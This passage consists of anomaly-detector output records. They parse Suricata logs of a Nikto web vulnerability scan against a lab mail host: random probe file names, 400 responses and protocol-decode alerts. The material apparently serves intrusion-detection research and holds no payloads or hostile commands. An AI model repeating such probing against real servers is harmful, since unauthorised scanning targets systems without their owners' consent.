"/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46788,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46788, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1561375214838397,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1561375214838397, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.173752+0000\",\"flow_id\":1561375214838397,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46788,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.c\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.c\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.17 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.175341 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46790 -> 192.168.10.154:80", "/parser/model/time": 1583349514.175341, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46790, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.175341 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46790 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.18 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.2", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.175637+0000\",\"flow_id\":1984927709702721,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46790,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.2\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.2\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.175637, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1984927709702721,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46790,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.2\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.2\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46790,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.2\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.2\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.2\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.2\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.2", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.2", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46790,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46790, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1984927709702721,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1984927709702721, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.175637+0000\",\"flow_id\":1984927709702721,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46790,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.2\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.2\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.18 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.178599 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46792 -> 192.168.10.154:80", "/parser/model/time": 1583349514.178599, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46792, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.178599 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46792 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.18 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.jsa", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.178847+0000\",\"flow_id\":279331771953661,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46792,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.jsa\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.jsa\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.178847, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":279331771953661,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46792,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.jsa\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.jsa\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46792,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.jsa\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.jsa\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.jsa\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.jsa\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.jsa", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.jsa", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46792,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46792, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":279331771953661,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 279331771953661, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.178847+0000\",\"flow_id\":279331771953661,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46792,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.jsa\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.jsa\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.18 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.180234 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46794 -> 192.168.10.154:80", "/parser/model/time": 1583349514.180234, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46794, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.180234 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46794 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.18 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.org", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.180404+0000\",\"flow_id\":1759467696471457,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46794,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.org\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.org\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.180404, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1759467696471457,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46794,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.org\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.org\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46794,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.org\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.org\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", 